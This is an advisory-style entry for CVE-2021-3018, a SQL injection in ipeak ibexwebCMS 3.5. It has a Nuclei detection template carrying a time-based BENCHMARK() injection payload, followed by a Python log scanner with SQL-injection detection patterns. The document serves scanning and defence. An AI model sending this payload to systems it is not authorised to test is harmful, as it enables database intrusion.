Vulnerability description
ipeak Infosystems ibexwebCMS 3.5 contains an unauthenticated Boolean-based SQL injection caused by the unsanitized 'id' parameter in /cms/print.php, letting attackers execute arbitrary SQL commands; the exploit requires no authentication.
```yaml
id: CVE-2021-3018

info:
  name: IPeakCMS 3.5 - SQL Injection
  author: theamanrawat
  severity: critical
  description: |
    ipeak Infosystems ibexwebCMS 3.5 contains an unauthenticated Boolean-based SQL injection caused by the unsanitized 'id' parameter in /cms/print.php, letting attackers execute arbitrary SQL commands; the exploit requires no authentication.
  reference:
    - https://github.com/M4DM0e/m4dm0e.github.io/blob/gh-pages/_posts/2020-12-07-ipeak-cms-sqli.md
    - https://m4dm0e.github.io/2020/12/07/ipeak-cms-sqli.html
    - https://nvd.nist.gov/vuln/detail/CVE-2021-3018
  impact: |
    Attackers can execute arbitrary SQL commands, potentially leading to data disclosure, data tampering, or full database compromise.
  remediation: |
    Apply the latest security patches or update to a version that fixes this vulnerability.
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2021-3018
    epss-score: 0.54931
    epss-percentile: 0.97923
    cwe-id: CWE-89
    cpe: cpe:2.3:a:ipeak:ipeakcms:3.5:*:*:*:*:*:*:*
  metadata:
    verified: false
    max-request: 2
    vendor: ipeak
    product: ipeakcms
    fofa-query: body="ipeak" && body="3.5"
  tags: cve,cve2021,ipeakcms,cms,sqli,unauth,vkev,vuln

flow: http(1) && http(2)

http:
  - raw:
      - |
        GET /cms/ HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - 'contains_all(body, "ipeak", "webCMS-3.5")'
          - 'status_code == 200'
        condition: and
        internal: true

  - raw:
      - |
        @timeout: 30s
        GET /cms/print.php?id=1%20AND%207334=BENCHMARK(8000000,MD5(0x73636a72)) HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - 'duration>=8'
          - 'status_code == 200'
          - 'contains(body,"onLoad=\"print();\"")'
        condition: and
# digest: 490a0046304402202cf68e46e31ef23c6de01c087f818b9250a15899ba20cd0748ea5f1eab1e7f4602207e0a7ce4ca934f10378ccfa8670912a3eb57045661f1f8bf459d41a36bb493ec:922c64590222798bb761d5b6d8e72950
```
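The template above confirms the flaw from the outside by timing a BENCHMARK() probe; the defender's counterpart is to spot such probes in web-server logs. The following is an added example, not part of the Nuclei template or of the vendor's code: it scans access-log lines for requests to /cms/print.php whose 'id' parameter is not a plain integer and lists the SQL markers found. The combined log format and the sample lines are assumptions constructed for the example.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Apache/nginx "combined"-style line: client, timestamp, request line, status, size.
# (Format is an assumption; adjust LOG_RE to your server's log format.)
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) \S+" '
    r'(?P<status>\d{3}) (?P<size>\S+)')

# Functions/operators typical of time-based (BENCHMARK, SLEEP) and boolean (AND/OR) probes.
SQLI_MARKERS = re.compile(
    r"\b(?:BENCHMARK|SLEEP|UNION|SELECT|AND|OR)\b|['\"]|--|/\*", re.IGNORECASE)

# Constructed sample traffic, not a real capture: one legitimate hit, two probes,
# and one request to a different script that must not be flagged.
SAMPLE_LOG = [
    '10.0.0.5 - - [07/Dec/2020:10:00:01 +0000] "GET /cms/print.php?id=12 HTTP/1.1" 200 2048',
    '10.0.0.9 - - [07/Dec/2020:10:00:02 +0000] "GET /cms/print.php?id=1%20AND%207334=BENCHMARK(8000000,MD5(0x73636a72)) HTTP/1.1" 200 2048',
    '10.0.0.9 - - [07/Dec/2020:10:00:03 +0000] "GET /cms/index.php?id=1%27 HTTP/1.1" 200 512',
    '10.0.0.9 - - [07/Dec/2020:10:00:04 +0000] "GET /cms/print.php?id=1%27 HTTP/1.1" 500 0',
]

def classify_request(target: str):
    """Return a reason string when the request probes print.php's id parameter, else None."""
    parts = urlsplit(target)
    if parts.path != "/cms/print.php":
        return None
    ids = parse_qs(parts.query, keep_blank_values=True).get("id")
    if not ids:
        return None
    value = ids[0]                      # parse_qs already percent-decodes (%20 -> space)
    if re.fullmatch(r"\d+", value):
        return None                     # a plain integer is the only legitimate shape
    markers = sorted({m.upper() for m in SQLI_MARKERS.findall(value)})
    return "non-numeric id" + (f", markers: {','.join(markers)}" if markers else "")

def scan_log(lines):
    """Return (client_ip, reason, raw_target) for every suspicious request in lines."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue                    # skip lines that do not match the expected format
        reason = classify_request(m["target"])
        if reason:
            findings.append((m["ip"], reason, m["target"]))
    return findings

if __name__ == "__main__":
    for ip, reason, target in scan_log(SAMPLE_LOG):
        print(f"{ip}: {reason} -> {target}")
```

Because the server-side fix is a parameterised query with an integer-cast id, a flagged request after patching is a probe attempt worth correlating with the client IP, not a sign of compromise on its own.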